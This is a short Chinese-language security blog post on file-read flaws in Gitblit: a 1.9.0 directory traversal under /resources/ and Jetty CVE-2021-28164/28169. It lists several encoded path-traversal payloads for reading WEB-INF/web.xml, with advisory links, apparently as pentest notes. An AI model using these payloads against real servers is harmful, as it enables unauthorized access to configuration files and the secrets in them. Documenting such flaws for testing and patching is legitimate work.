gitblit漏洞管理

一、1.9.0目录穿越

在GET /resources/目录下存在漏洞,可以获取目录下的所有文件内容。

image

 burpsuite里修改成/../WEB-INF/web.xml

image

参考链接:

https://www.gitblit.com/releasenotes.html
https://github.com/gitblit-org/gitblit/issues 

 二、jetty漏洞

cve-2021-28164&cve-2021-28169:读取WEB-INF下的文件,可通过以下方式绕过。gitblit使用jetty,因此也有可能存在此漏洞。 

/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web

  image

 参考链接:

https://github.com/jetty/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md
https://xz.aliyun.com/news/9489

 

posted @ 2025-12-30 14:47  hopeccie  阅读(2)  评论(0)    收藏  举报